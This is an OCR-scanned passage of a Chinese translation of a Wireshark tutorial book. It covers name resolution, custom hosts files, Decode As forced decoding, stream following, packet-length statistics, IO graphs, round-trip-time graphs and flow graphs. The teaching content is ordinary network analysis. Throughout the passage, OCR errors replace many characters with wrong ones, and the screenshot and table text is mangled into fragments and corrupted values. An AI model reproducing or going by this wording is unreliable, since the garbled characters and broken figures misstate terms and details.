用 的 DNS 服 务 右 时 。 名 称 解 析 的 信息 是 不 会 你 存在 捕获 文件 里 的 ， 所 以 
在 你 每 次 打开 一 个 捕获 文件 的 时 候 都 要 重新 进行 一 次 名 称 解 析 。 如 末 你 
在 一 个 网 络 环境 下 捕获 了 流量 ， 那 么 在 夯 一 个 网 络 环境 中 打开 该 捕获 文 
件 时 ， 你 的 系统 可 能 访问 不 到 之 前 的 DNS 服务 邢 。 


除 此 之 外 ， 名 称 解析 还 会 市 来 额外 的 处 理 开 销 。 如 末 你 正在 处 理 一 
个 非 钊 大 的 捕获 文件 而 内 存 不 剩 多 少 的 时 候 ， 你 可 能 需要 关闭 名 称 解 
析 ， 来 节约 系统 资源 。 


另 一 个 问题 加 是 ， 对 DNS 名 称 解 析 的 依赖 会 产生 人 额外 的 数据 包 ， 也 
吏 是 说 你 的 捕获 文件 可 能 会 家 解析 那些 基于 DNS 地 址 的 流量 所 占据 。 我 
们 还 可 以 再 把 问题 想 得 复 杂 一 些 ， 如 果 在 你 分 析 的 捕获 文件 中 人 台 有 秋 意 
IP 地 址 ， 那 么 试图 去 解析 它们 会 生成 对 攻击 者 控制 的 基础 架构 的 查询 ， 
这 样 攻击 者 束 有 可 能 知道 你 的 动作 ， 其 至 把 你 目 己 变 成 双子 。 要 避免 跟 
攻击 者 打交道 ， 请 在 名 称 解 析 选 项 对 话 框 中 天 挥 Use an external network 


name resolver。 


5.3.3 ”使 用 目 定义 hosts 文 件 


在 一 个 大 型 捕获 文件 中 ， 不 断 从 多 个 主机 之 间 跟 踩 流 量 是 一 件 很 乏 
味 的 事情 ， 特 别 是 当 外 部 主机 解析 服务 访问 不 到 的 时 候 。 好 在 我 们 可 以 
根据 它们 的 IP 地 址 并 有 日 通过 一 个 叫 Wireshark hosts 的 文件 来 手动 地 标识 
系统 。Wireshark 的 hosts 文 件 实 质 是 由 IP 地 址 列表 和 与 之 对 应 的 名 字 组 成 
的 文本 文件 。 为 了 快速 查询 ， 你 可 以 在 Wireshark 里 使 用 hosts 文 件 来 标 
记 地 址 。 这 些 名 字 会 显示 在 数据 包 列 表 窗 格 里 。 


要 使 用 hosts 文 件 ， 请 按照 以 下 步骤 操作 。 


(1) 单 击 Edit->Preferences->Name Resolution 并 有 日 选择 Only use the 
profile "hosts" file。 


(2) 使 用 Windows 记 事 本 或 者 类 似 的 文本 编辑 右 创 建 一 个 新 文 
件 。 访 文件 应 访 包 舍 至 少 一 条 IP 和 对 应 名 称 的 记录 ， 如 图 5-9 所 示 。 
Wireshark 会 根据 这 个 映射 来 把 相应 的 耳 地址 普 换 为 hosts 文 件 里 对 应 的 名 
称 并 最 终 显 示 在 包 列 表 窗 格 里 。 


总 | haosts - Notepad 
File Edit Format View Help 
172.16.16.128 Workstation 


74.125.95.184 6oogle 





图 5-9 ”创建 一 个 Wireshark hosts 文 件 


(3) 把 文件 以 文本 格式 存 为 hosts 并 将 其 保存 到 正确 的 目录 下 ， 如 
下 所 示 。 请 确 你 文件 名 没有 后 级 ! 


e Windows: <USERPROFILE>\Application Data\Wireshark\hosts 
e OS X: /Users/<username>/.wireshark/hosts 
e Linux: /home/<usename>/.wireshark/hosts 


现在 打开 一 个 捕获 文件 ， 如 图 5-10 所 示 ， 所 有 在 hosts 文 件 里 的 IP 地 
址 名 被 解析 成 了 明确 的 名 称 。 现 在 有 看 更 有 意义 的 名 称 显 示 在 源 和 目的 
列 中 而 个 十 之 前 的 IP 地 址 。 

















图 5-10 ”根据 Wireshark hosts 文 件 进 行 名 称 解 析 


用 这 种 hosts 文 件 的 方式 可 以 在 分 析 中 大 幅 增 强 识 列 特定 主机 的 能 
力 。 当 团队 协作 分 析 时 ， 请 考虑 将 hosts 文 件 共 于 给 其 他 网 络 上 的 同事 。 
这 会 帮助 你 的 团队 迅速 识别 一 些 使 用 表态 地 址 的 基础 系统 ， 比 如 服务 需 
和 路 由 兹 。 


| 六 二 生 呈 时 时 时 时 时 时 时 时 和 


如 果 你 的 hosts 文 件 不 起 作用 了 ， 请 确保 你 没有 章 外 地 在 文件 名 后 面 加 后 级 名 。 这 个 文件 
的 名 字 束 叫 hosts。 





5.4 协议 解析 


Wireshatk 最 大 的 优势 束 古 对 上 干 种 协议 解析 的 文 持 。Wireshark 有 
这 种 能 力 的 原因 是 它 是 开源 软件 ， 能 够 给 开发 者 一 个 创造 协议 解析 疾 
(protocol dissectors ) 的 框架 。Wireshark 中 的 协议 解析 器 允许 你 将 数据 
包 拆 分 成 多 个 协议 区 段 以 便 分 析 。 举 例 来 说 ，Wireshark 的 ICMP 协 议 解 
析 器 可 能 将 网 络 上 的 原始 数据 提取 出 来 ， 对 其 进行 格式 化 并 以 ICMP 数 
据 包 格式 显示 出 来 。 


你 可 以 将 解析 器 看 作 是 一 个 网 络 原 始 数 据 流 和 Wireshark 程 序 之 间 的 
翻 详 项 。 如 果 需 要 Wireshark 文 持 菜 一 个 协议 ， 那 么 它 束 必须 拥有 一 个 内 
置 的 解析 器 (或 者 你 可 以 目 己 写 一 个 ) 。 


5.4.1 更换 解析 货 


Wireshark 使 用 解析 右 来 识 列 每 个 协议 并 且 决 定 该 如 何 显 示 网 络 信 
恩 。 不 着 的 是 ，Wireshark 在 给 一 个 数据 包 选 撞 解 析 硕 时 也 并 不 是 每 次 都 
能 选 对 ， 尤 其 古 当 网 络 上 的 一 个 协议 使 用 了 不 同 于 标准 的 配置 时 ， 比 如 


非 缺 省 痛 口 《网 络 管理 员 通 种 会 出 于 安全 若 夸 ， 或 者 是 员工 力 要 如 开 访 
问 控制 而 进行 设置 ) 。 


当 错 误 地 应 用 解析 需 时 ， 我 们 可 以 人 为 地 干预 Wireshark 的 选择 。 举 
例 来 说 ， Ri pcapng 这 个 捕获 文件 ， 可 以 注意 到 这 个 文 
件 中 包含 了 大 量 两 台 计 算 机 之 间 的 SSL 通 信 。SSL 是 安全 接口 层 协 议 
(Secure Socket bo ed ， 用 来 在 主机 之 间 进 行 安全 加 密 的 传 
输 。 由 于 其 保密 性 ， 因 此 大 多 数 的 正常 情况 下 ， 在 Wireshark 中 查看 SSL 
流量 不 会 产生 什么 有 用 的 信息 ， 但 这 里 一 定 存 在 着 一 些 问 题 。 如 果 你 单 
击 其 中 的 几 个 数据 包 ， 然 后 在 Packet Bytes 面 板 中 仔细 查看 这 几 个 数据 包 
的 内 容 ， 很 快 束 会 发 现 一 些 明 文 流 量 。 事 实 上 ， 如 果 你 看 第 4 个 数据 
包 ， 就 会 发 现 其 中 提 到 了 FileZilla FTP 服 务 器 程序 (FileZilla FTP server 
application〉， 并 且 之 后 的 几 个 数据 包 清 晰 地 显示 了 对 于 用 望 名 和 密码 
的 请 求 与 啊 应 。 


如 果 这 真是 SSL 流 量 ， 那 么 你 应 该 不 会 读 到 数据 包 中 的 任何 数据 ， 
并 且 你 也 不 会 看 到 以 明文 传输 的 所 有 用 户 名 和 密码 〈( 见 图 5-11〉。 根 据 
这 些 信 息 ， 我 们 可 以 推测 出 这 应 该 是 一 个 FTP 流量 而 不 是 SSL 流 量 ， 而 
导致 错误 选择 解析 器 的 原因 应 该 是 这 个 FTP 流 量 使 用 了 原本 用 作 
HTTPS 〈 基 于 SSL 的 HITTP) 标准 端口 的 443 端 口 。 











Tr 
4 192.168.09.53 192.168.9.82 TCP 115 443 > 1492 [PSH，ACK] Seq=189275832 Ack=253948672 Win= 
8 9.936653 192.168.9.82 192.168.0.53 TCP 66 1492 > 443 [PSH, ACK] Seq=253948672 Ack=189275893 Win= 
9 9.937776 192.168.9.53 192.168.9.82 TCP 87 443 > 1492 [PSH, ACK] Seq=189275893 Ack=253948684 Win=64 
19 9.938371 192.168.9.82 192.168.0.53 TECP 66 1492 > 443 [PSH, ACK] Seq=253948684 Ack=189275126 Win= 
11 9.938876 192.168.9.53 192.168.9.82 TCP 69 443 > 1492 [PSH，ACK] Seq=189275126 Ack=253948696 Win= 216.. 
12 8.09409679 192.168.9.82 192.168.0.53 TCP 68 1492 > 443 2 2 Seq=253948696 Ack=189275141 Min=65286.. 











rame 19: 66 了 i Ee captured (528 bits) 
Dst: ee _25:092:5e (060:9c:29:25:02:5e) 


| Sr 














OY Dab (data), 12 byt=s || Packets: 52 * Displayed: 52 (100.0%) * Load time: 0:0.1|| Profile: Default 





图 5-11 ”明文 用 户 名 和 密码 ? 这 更 像 是 FTP 而 不 是 SSL! 


为 本 解决 这 个 问题， 你 可 以 强制 Wireshark 对 这 个 数据 包 使 用 FTP 协 
议 解析 妖 。 这 个 过 程 税 称 为 强制 解 公 ， 需 要 按 如 下 操作 。 


(1) 在 协议 列 右键 单 击 其 中 一 个 SSL 数 据 包 (比如 第 30 号 包 ) ， 
选择 Decode As。 这 时 会 弹出 一 个 对 话 框 ， 你 可 以 从 中 选择 想 要 使 用 的 
解析 器 ， 如 图 5-12 所 示 。 


(2) 在 下 拉 来 早 中 选择 destination (443) ， 并 企 Transport 选 项 下 
中 选择 FTP， 以 便 让 Wireshark 使 用 FTP 解 析 器 对 所 有 端口 号 为 443 的 TCP 
流量 进行 解码 〈 见 图 5-12) 。 


(3) 在 你 选 好 之 后 单 击 OK， 束 可 以 立刻 将 修改 应 用 到 捕获 文件 中 


数据 已经 被 解 公 为 FITP 流 量 ， 这 时 你 束 可 以 从 Packet List 面 板 中 对 它 
进行 分 析 ， 而 不 是 对 每 一 个 字 节 下 功夫 ( 见 图 5-13) 。 


题 Wireshark , Decode As... 


Current 


[FTP 


Default 
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图 5-12 ”Decode As 对 话 框 可 以 让 你 进行 强制 解码 





帮 wrongdissector.pcap = 口 xX 
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54 1492 > 443 [ACK] Seq=253948672 Ack=189274945 Win=65536 Len=8 

96 Response: 226-Filezil1la Ser 

99 Response: 226-written by Tim Kosse (Tim.Kosse@ 

54 1492 > 443 [ACK] Seq= 了 全 Ac 2 189275832 Win=65536 Len=8 

115 Response: 228 Pl1 t http://sourceforge.net/projects/filezilla/ | 
66 Request: USER admi 

87 Response: 331 Password required for admi 
66 Request: PASS 


Response: 238 
est: SYST 


86 Response: 215 UNIX emulated by Filezilla 
68 Request: FEAT 

69 Response: 211-Features: 

61 Response: MDT™ 





图 5-13 ”查看 被 解码 为 FTP 的 流量 


你 可 以 在 同一 个 捕获 文件 中 多 次 使 用 强制 解码 功能 。Wireshark 将 在 
Decode As... 对 话 框 中 跟踪 你 的 强制 解码 操作 ， 在 这 里 你 可 以 查看 并 编辑 
之 前 创建 的 强制 解码 。 


在 献 认 情 况 下 ， 妆 你 天 挥 捕获 文件 时 强制 解码 的 设置 不 会 你 存 。 补 


救 方 法 就 是 在 Decode As.…. 对 话 框 中 单 击 Save 按 钮 。 这 会 将 协议 解码 规则 
保存 到 你 的 Wireshark 用 户 配 置 文件 中 ， 因 此 当 你 使 用 访 配 置 文件 打开 任 
意 捕 获 文件 时 ， 它 们 将 会 生效 。 要 移 除 之 前 保存 的 解 但 规则 ， 你 可 以 在 
对 话 框 中 单 击 减 亏 投 钮 。 


把 保存 了 的 解码 规则 筷 到 脑 后 是 很 容易 的 。 这 会 造成 很 多 混乱 ， 
此 要 多 留意 强制 解 公 规则 。 要 避免 目 己 挥 入 这 个 大 坑 ， 我 在 目 己 的 主要 
Wireshark 设 置 档案 里 一 般 避 人 免 保 存 强 制 解 公设 置 。 


5.4.2 ”全 看 解析 此 源 代 公 


开源 软件 的 美妙 之 处 就 在 于 ， 当 对 正在 进行 的 事情 感到 困惑 时 ， 你 
可 以 直接 查看 源 代码 来 找到 具体 原因 。 当 你 想 查 明 一 个 特定 的 协议 没有 
被 正确 解析 的 原因 时 ， 这 一 点 就 变 得 非常 顺手 了 。 


在 Wireshark 网 站 上 的 Develop 链 接 中 ， 单 击 Browse the Code， 束 可 
以 直接 人 查看 协议 解 术 器 的 源 人 代码。 这 个 链接 直接 指 癌 Wireshark 的 代码 仓 
库 ， 里 面 有 Wireshark 的 最 新 以 及 之 前 的 发 行 版 。 单 击 releases 文 件 来， 
便 能 看 见 所 有 官方 的 Wireshark 〈 甚 至 包括 Ethereal) 发 行 版 ， 其 中 最 新 
版 将 在 最 下 面 显 示 出 来 。 在 你 选择 了 想 要 查看 的 发 行 版 之 后 ， 
在 epan/dissectors 文 件 夹 下 可 以 找到 协议 解析 占 。 每 一 个 解析 占 都 以 
packets-<protocolname>.c〔( 数 据 包 -协议 名 称 .c) 的 形式 命名 。 


这 些 文件 可 能 会 很 复 淋 ， 但 你 应 该 可 以 友 现 它们 都 锭 循 痢 同一 个 标 
准 模 板 并 有 着 详细 的 注释 。 你 并 不 需要 成 为 一 个 C 语 言 专 家 ， 融 可 以 理 
解 每 一 个 解析 右 的 基本 功能 。 如 果 你 想 深 入 理解 在 Wireshark 中 所 看 到 
的 ， 我 强烈 建议 你 至 少 看 一 些 简 里 协议 的 解析 融 。 


5.5” 流 跟 踪 


Wireshark 分 析 功 能 中 令 人 满意 的 一 点 下 是 它 能 够 将 来 日 不 同 包 的 数 
据 香 组 成 统一 多 读 的 格式 ， 一 般 称 作 packet transcript。 流 跟踪 功能 可 以 
把 从 客户 靖 友 往 服务 端的 数据 都 排 好 序 使 其 变 得 更 易 簿 看， 这 样 你 驶 不 
需要 从 一 堆 小 块 数 据 里 一 个 包 一 个 包 地 跟踪 了 了 。 


现 有 4 种 类 型 的 流 可 以 被 跟踪 。 

TCP 流 : 重组 使 用 TCP 协 议 的 数据 ， 比 如 HTTP 和 FTP。 

UDP 流 : 重组 使 用 UDP 协议 的 数据 ， 比 如 DNS 。 

SSL 流 : 重组 加 密 的 协议 ， 比 如 HTTPS。 你 必须 提供 密 钥 来 解密 流 

HTTP 流 : 从 HTTP 协 议 中 重组 和 解压 数据 。 当 使 用 TCP 流 跟踪 但 义 
没有 完全 解码 出 HTTP 数 据 时 ， 这 个 功能 就 派 上 用 场 了 。 

我 们 以 一 个 简单 的 HTTP 交 互 淮 例 来 说， 打开 http_google.pcapng， 
并 在 文件 中 单 击 任意 一 个 TCP 或 者 HTTP 数 据 包 ， 右 键 单 击 这 个 文件 并 


选择 Follow TCP Stream。 这 时 TCP 尝 就 会 在 一 个 日 独 的 窗口 中 显示 出 来 
( 见 图 5-14) 。 





帮 Wireshark . Follow TCP Strearr (tcp.stream eq 0) . http_google = 口 Xx 
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图 5-14 ”跟踪 TCP 流 窗口 将 通信 内容 以 更 简单 可 恋 的 方式 进行 了 重新 组 织 


我 们 注意 到 这 个 窗口 中 的 文字 以 两 个 颜色 显示 ， 其 中 红色 用 来 标明 
从 源 地 址 前 往 目标 地 址 的 流量 ， 而 蓝 色 用 来 区 分 出 相反 方向 ， 也 就 是 从 
目标 地 址 到 源 地 址 的 流量 。 这 里 的 颜色 标记 以 哪 方 先 开 始 通信 为 准 ， 在 
我 们 的 例子 中 ， 客 尸 问 最 先 建立 了 到 服务 右 的 连接 ， 所 以 喧 示 为 红色 。 


在 这 个 TCP 流 中 ， 你 可 以 消 晰 地 看 到 这 两 台 主 机 之 间 进 行 的 绝 大 多 


数 通 信 。 在 这 些 通信 开始 的 时 候 ， 最 初 是 对 Web 根 目录 的 GET 请 求 ， 然 
后 是 来 自 服务 器 的 一 个 用 HTTP/1.1 200 OK 表示 请 求 成 功 的 响应 。 当 客 
户 端 请 求 另 一 个 文件 并 由 服务 器 给 予 啊 应 的 时 候 ， 这 个 简单 模式 怠 会 重 
复出 现 。 你 可 以 看 到 一 个 用 户 正在 浏览 Google 首 页 ， 但 你 不 需要 遍历 每 
个 数据 包 ， 束 可 以 轻松 地 深 动 文本 ， 事 实 上 你 和 这 个 用 户 看 到 的 别 无 二 
致 ， 只 不 过 是 以 更 深入 的 形式 去 看 。 

在 这 个 窗口 中 除了 能 够 看 到 这 些 原 始 数据 ， 你 还 可 以 在 文本 间 进 行 
搜索 ， 将 其 保存 成 一 个 文件 ， 打 印 出 来 ， 也 可 以 用 ASCII 人 码 、 
EBCDIC、 十 六 进 制 或 者 C 数 组 的 格式 去 看 。 这 些 选 项 都 可 以 在 跟踪 TCP 
流 窗口 的 下 面 找 到 。 


跟踪 TCP 流 在 你 和 一 些 协议 打交道 的 时 候 ， 绝 对 是 一 个 好 方法 。 
跟踪 SSL 流 


跟踪 TCP 和 UDP 流 是 一 个 简单 的 双击 操作 ， 但 以 可 读 的 形式 查看 
SSL 流 还 需要 额外 的 步 又， 因为 流量 都 是 加 密 的 ， 所 以 你 必须 提供 与 服 
务 器 加 密 所 对 应 的 私 铀 。 获 取 私 钥 的 方法 取 诀 于 服务 端 所 使 用 的 技术 ， 
这 不 在 本 书 的 探讨 范围 内 。 但 是 一 旦 有 了 私 钥 ， 你 就 可 以 按照 以 下 步 双 
把 它 加 载 到 Wireshark 里 。 


(1) 单 击 Edit->Preferences 进 入 Wireshark 选 项 设置 。 


(2) 展开 协议 〈Protocols) 部 分 并 且 选 择 SSL 协 议 标题 ， 如 图 5-15 
所 示 。 


(3) 早 击 加 号 (+) 按钮 。 


(4) 所 供 所 需要 的 信息 ， 包 括 加 密 服 务 占 的 人 P 地 址 、 端 口 、 协 
议 、 密 铀 文件 地 址 和 密 钥 文件 所 使 用 的 密 公 《如 条 需要 的 话 ) 。 


(5) 重启 Wireshark。 
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图 5-15 ”添加 SSL 人 解密 信息 


如 果 一 切 顺 利 的 话 ， 你 就 可 以 捕获 客户 病 和 服务 妖 之 间 的 加 冠 流 量 
了 。 右 键 时 击 一 个 HTTPS 的 包 ， 人 然后 蛙 击 Follow SSL Stream， 然 后 你 整 
可 以 清晰 地 看 到 这 一 串 SSL 流 的 明文 内 容 了 了 。 


查看 数据 包 脚 本 是 Wireshark 中 的 一 个 常用 的 分 析 功 能 ， 你 将 依赖 它 
来 快速 确定 正在 使 用 的 特定 协议 。 我 们 将 在 后 面 的 章节 中 介绍 几 个 其 他 
的 依赖 于 查看 数据 包 脚 本 的 方案 。 


5.6 ”数据 包 长 虔 


一 个 或 一 组 数据 包 的 大 小 可 以 让 你 了 解 很 多 情况 。 在 正常 情况 下 ， 
一 个 以 太 网 上 的 帧 最 大 长 度 为 1518 字 节 ， 除 去 以 太 网 、 卫 以 及 TCP 头 ， 
还 剩 下 1460 字 和 以 供应 用 层 协 议 的 头 或 者 数据 使 用 。 如 果 你 知道 报 文 传 
输 的 最 小 需求 ， 那 么 我 们 束 可 以 通过 一 个 捕获 文件 中 数据 包 长 度 的 分 布 
情况 ， 做 一 些 对 流量 的 合理 猪 测 。 这 个 技巧 对 我 们 尝试 理解 捕获 文件 的 
组 成 结构 十 分 重要 。Wireshatk 提 供 了 数据 包 长 上 肛 窗 口 ， 帮 助 你 查看 数据 
包 基 于 其 长 大 的 分 布 情 况 。 


文件 download-slow.pcapng 束 是 一 个 很 好 的 例子 。 打 开 文 件 后 ， 选 
择 Statistics->Packet Lengths， 束 会 出 现 一 个 如 图 5-16 所 示 的 数据 包 长 度 


对 话 框 。 


是 Wireshark . Packet Lengths . download-slow 


opic / ltem Count Average Mlinwval ulax wal Rate lms)} Percent Burstrate Burst start 
acket Lengths 10728 988.99 对 1460 0.0614 1003% 0.2100 69,617 
0-19 | 0.0000 = 
20-39 0 本 0.0000 
0-79 3587 07 34 0.0205 4 OO 31.017 
80-1393 0 l 0.0000 和 - 


160-319 0 0.0000 


320-639 ] 634.00 634 0.0000 0.01% 0.178 
40-1279 13 B108 7758 0.0001 0.12% 0.921 
1280-2539 Tar 14346000 1458 0.0408 器 35 69.617 


2560-5119 0 0.0000 
5120 and greater 0 a - - 0.0000 


Display filter: Enter a display filter ... 








图 5-16 ”数据 包 长 度 窗 口 帮 助 你 对 捕获 文件 中 的 流量 进行 合理 的 狂 测 


特别 注意 那些 大 小 为 1280 一 2559 字 节 的 数据 包 统 计 的 行 。 这 些 较 大 
的 数据 包 通 党 表示 数据 传输 ， 而 较 小 的 数据 包 则 表示 协议 控制 序列 。 在 
这 个 例子 中 ， 我 们 看 到 较 大 的 数据 包 占 了 相当 大 的 比重 (66.43%) 。 即 
使 不 看 这 个 文件 中 的 数据 包 ， 我 们 也 仍然 可 以 知道 捕获 中 包含 了 一 个 或 
多 个 数据 传输 流量 。 这 可 能 是 HTTP 下 载 FTP 上 传 ， 或 者 其 他 类 型 在 
主机 之 间 进 行 数 据 传输 的 网 络 通 信 。 


剩 下 的 大 多 数 数 据 包 〈33.44%) 都 是 在 40 一 79 字 节 范 围 内 ， 而 处 于 
这 个 苑 围 的 数据 包 通 和 是 不 包含 数据 的 TCP 控 制 数据 包 。 我 们 可 以 想 一 
下 协议 头 一 般 的 大 小 。 以 太 网 报头 是 14 字 节 〈 和 包含 4 字 节 CRC) ，IP 报 
头 至 少 20 字 节 ， 没 有 数据 以 及 选项 的 TCP 数 据 包 也 是 20 字 节 ， 也 惑 意 味 
着 典型 的 TCP 控 制 数 据 包 一 一 例如 TCP、ACK、RST 和 FIN 数 据 包 
AM 并 落 入 了 这 个 区 域 。 当 然 IP 或 TCP 的 额外 选项 会 增加 它 的 


伍 看 数据 包 长 度 是 一 个 马 虞 捕获 文 件 的 好 方法 。 如 来 存在 看 很 多 较 
大 的 数据 包 ， 那 么 很 可 能 是 进行 了 数据 传输 。 如 果 绝 大 多 数 的 数据 包 部 
很 小 ， 我 们 便 可 以 假设 这 个 捕获 中 存在 协议 控制 命 念 ， 而 没有 传输 大 规 
模 的 数据 。 虽 然 这 不 是 一 个 必需 的 操作 ， 但 在 深入 分 析 前 做 一 些 类 似 的 
假设 ， 有 时 还 是 很 保险 的 。 


5.7 ”图 形 展 示 





图 形 是 分 析 工 作 中 必 不 可 少 的 一 部 分 ， 并 且 也 是 得 到 一 个 数据 集 概 
哆 的 好 方法 。Wireshark 中 有 一 些 不 同 的 图 形 展示 功能 ， 可 以 帮助 你 更 好 
地 了 解 捕 获 数 据 ， 其 中 第 一 个 便 是 IO 图 形 化 功能 。 


5.7.1 查看 IO 图 


Wireshark 的 IO 图 窗口 允许 你 对 网 络 上 的 吞吐 量 进行 绘图 。 你 可 以 
利用 这 些 图 ， 找 到 数据 吞吐 的 峰值 ， 找 出 不 同 协议 中 的 性 能 时 涉 ， 以 及 
比较 实时 数据 沪 。 

打开 download-fast.pcapng， 单 击 任意 一 个 TCP 数 据 包 并 将 其 高 完 ， 
然后 选择 Statistics->IO Graphs， 束 可 以 看 到 一 台 计 算 机 在 从 互联 网 上 下 
载 文 件 时 的 IO 图 的 例子 。 

这 个 IO 图 窗口 显示 了 数据 法 随时 间 变 化 的 一 个 图 形 化 视图 。 在 图 5- 
17 这 个 例子 中 所 显示 的 下 载 量 可 知 ， 每 个 周期 大 约 有 500 个 数据 包 ， 其 
过 程 中 在 一 定 程 度 上 体 持 不 变 并 在 最 后 逐渐 减少 。 


帮 Wireshark .1O Graphs . download -fast 一 口 x 





Wireshark IO Graphs: download-fast 

















图 5-17 ”快速 下 载 的 IO 图 基本 上 是 稳定 的 


我 们 可 以 将 它 与 一 个 较 慢 的 下 载 过 程 做 比较 。 不 要 关闭 当前 这 个 文 
件 ， 然 后 吨 外 再 司 动 一 个 Wireshark 并 打开 download-slow.pcapng。 打 开 
这 个 下 载 过 程 的 IO 图 ， 如 图 5-18 所 示 ， 便 可 以 看 到 与 之 前 大 为 不同 。 





帮 Wireshark .10 Graphs . download-slow 


Wireshark IO Graphs: download-slow 





Cicf to select packert S876 {345 = 30). 





Name Display filter Colo 
All packets 国 Line 
TCP errors tcp.analysis,flags 围 

















图 5-18 ” 慢 速 下 载 的 IO 图 特别 不 稳定 


这 个 下 载 过 程 每 秒 传输 的 数据 包 为 0 一 100 人 个， 并且 译 动 很 大 ， 其 中 
也 曾 和 暂时 接近 每 秒 0 个 数据 包 。 如 果 你 将 这 两 个 捕获 文件 的 IO 并 排放 
置 ， 就 能 更 清楚 地 看 到 这 些 浮 动 〈 见 图 5-19) 。 当 比较 两 幅 图 时 ， 注 意 
正确 地 比较 x 轴 和 y 轴 的 值 。 图 中 的 缩放 比例 会 目 动 按照 包 和 /或 数据 的 
传输 量 来 调整 ， 这 也 是 图 5-19 中 左右 两 幅 图 的 主要 区 别 。 下 载 速 度 较 慢 
PA 
少 。 


你 应 该 可 以 注意 到 这 个 窗口 的 下 面 有 一 些 配置 选项 。 你 可 以 创建 多 
个 不 同 的 过 滤 右 使 用 与 显示 或 者 捕获 过 小 融 相 同 的 语法 ) ， 并 为 这 些 
过 小 各 指 定 显 示 的 闫 色 。 例 如 ， 你 可 以 把 生 定 的 了 P 过 滤 出 来 ， 并 且 给 它 
们 分 配 独 特 的 闫 色 ， 以 但 看 每 个 设备 不同 的 否 吐 量 。 让 我 们 来 试 一 试 
吧 。 





Wireshark IO Graphs: download-slow Wireshark 10 Graphs: download-fast 


























图 5-19 ”并 排查 看 多 个 IO 图 有 助 于 发 现 它们 之 则 的 差异 


打开 http_espn.pcapng， 这 是 在 一 个 设备 访问 ESPN 山 主页 时 捕获 
的 。 如 末 观 罕 会 话 窗 口 ， 你 会 看 到 有 看 最 大 用 量 的 外 网 IP 是 
205.234.218.129。 我 们 可 以 由 此 推断 ， 这 台 主 机 就 古 当 访问 ESPN 时 数据 
的 主要 提供 源 。 然 而 ， 也 有 一 些 其 他 IP 参 与 到 通信 中 ， 这 有 可 能 是 因为 
一 部 分 内 容 从 其 他 外 网 内 容 提 供 者 或 广告 商 处 下 载 而 来 。 我 们 使 用 图 5- 
20 所 示 的 IO 图 可 以 识别 出 第 一 和 第 三 方 内 容 提供 者 的 不 同 。 





帮 Wireshark .10 Graphs . http_espn 


Wireshark IO Graphs: http_espn 





Time (s) 
Hover over the graph for detais. 





Name Display filter Colo Style YAxis Y Field Smoothing 
Top Talker ip.addr==2035.234.218.129 图 | Stacked Bar Bytes/s None 
Everything Else lip.addr==205.234.218.129 图 Stacked Bar Bytes/s None 











+| | 一 | | 中 Mouse (®) drags OO zooms Interval | 1sec | []Tme of day [|] Log scale Reset 





图 5-20 ”显示 两 个 不 同 设备 的 10 图 


图 中 所 应 用 的 两 个 过 滤 右 ， 以 行 的 形式 在 窗口 下 方 表示 。 名 为 Top 
Talker 的 过 滤器 只 显示 IP 地 址 为 205.234.218.129 (主要 内 容 提 供 者 ) 的 
IO 情 况 ， 在 图 中 用 黑色 的 条 形 柱 表示 。 第 二 个 名 为 Everything Else 的 过 
滤 右 只 显示 除去 205.234.218.129 外 的 所 有 IO (第 三 方 内容 提 供 者 〉 情 
况 ， 在 图 中 用 红色 条 形 柱 表示 〈 在 这 里 是 灰色 ) 。 注 意 ， 我 们 把 y 轴 单 
位 变 成 了 字 节 每 秒 。 这 个 单位 能 让 我 们 非常 容易 地 看 到 第 一 和 第 三 方 内 
容 提 供 者 IO 的 差异 。 你 可 以 在 经 常 访问 的 网 站 上 做 一 做 这 个 有 趣 的 练 
习 ， 这 也 是 一 项 比较 不 同 网 络 主机 间 IO 的 有 用 策略 。 


5.7.2” 双 问 时 间 图 


Wireshark 中 的 为 一 个 绘图 功能 就 古 对 给 定 捕获 文件 的 双 问 时 间 绘 
图 。 双 同时 间 (round-trip time, RRT) 束 是 接收 数据 包 确 认 所 需 的 时 
旧 。 解 释 得 更 清楚 一 点 束 是 ， 双 同时 间 就 是 你 的 数据 包 抵 达 目 的 地 以 及 
接收 到 数据 包 确 认 所 需 的 时 间 之 和 。 对 双 回 时 间 的 分 析 通 稼 被 用 来 寻找 
通信 中 的 悍 点 或 者 瓶 筑 ， 以 确定 是 含 存在 延 开 。 


我 们 来 试 一 试 这 个 功能 吧 。 打 开 download-fast.pcapng 这 个 文件 ， 选 
择 一 个 TCP 数 据 包 ， 人 然后 选择 Statistics->TCP Stram Graph->Round Trip 
Time Graph， 这 个 双 同 时 间 如 图 5-21 所 示 。 





帮 Round Trip Time for 72.4.123.180:80 — 172.16.16.128:3218 一 口 X 


Round Trip Time for 72.4.123.180:80 — 172.16.16.128:3218 


download-fast,pcap 
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图 5-21 这 个 下 载 的 RTT 图 除了 一 些 偶 离 值 之 外 大 体 上 还 是 你 持 稳 定 的 


这 个 图 中 的 每 一 个 点 都 代表 了 一 个 数据 包 的 双 同 时 间 。 在 默认 情况 
下 ， 这 些 值 以 其 序列 号 排序 。 你 可 以 单 击 这 个 图 中 的 任何 一 个 点 ， 并 在 
Packet List 面 板 中 看 到 相应 的 数据 包 。 


| 注 喜 








RITT 图 是 单 问 性 的 ， 所 以 在 分 析 的 流量 上 选择 一 个 合适 的 方 同 是 很 重要 的 。 如 果 你 的 图 
表 看 起 来 不 像 图 5-21， 那 么 你 也 许 需 要 双击 一 下 Switch Direction 按 钮 。 





看 上 去 这 个 快速 下 载 过 程 双 同时 间 图 中 的 双 癌 时 间 大 多 都 在 0.05s 以 
下 ， 并 有 一 些 较 慢 的 点 位 于 0.10s 一 0.25s。 虽 然 存 在 少量 的 值 超出 了 可 


以 接受 的 范围 ， 但 大 多 数 的 双 辐 时 间 还 者 是 可 以 的 ， 所 以 对 于 文件 下 载 
来 资 ， 这 个 双 同 时 间 是 可 以 接受 的 。 当 使 用 RITT 图 检查 吞吐 量 方面 的 问 
题 时 ， 你 要 去 找 高 延迟 的 时 段 ， 这 在 图 中 用 多 个 高 Y 信 的 点 表示 。 


5.7.3 ”数据 法 图 


数据 流 给 图 功能 对 于 可 视 化 连接 以 及 显示 一 定时 间 的 数据 流 非 第 有 
用 ， 这 些 信息 便 你 可 以 更 轻松 地 了 解 设备 的 通信 方式 。 数 据 沉 图 基本 上 
以 列 的 方式 ， 将 主机 之 间 的 连接 显示 出 来 ， 并 将 流量 组 织 到 一 起 ， 以 便 
于 你 更 直观 地 解读 。 


要 生成 数据 流 图 ， 请 打开 dns_recursivequery_server.pcapng， 并 选择 
Statistics-> Flow Graph， 结 有 末 如 图 5-22 上 所 示 。 


题 Wireshark : Flow . dns_recursrveqUuery_server 


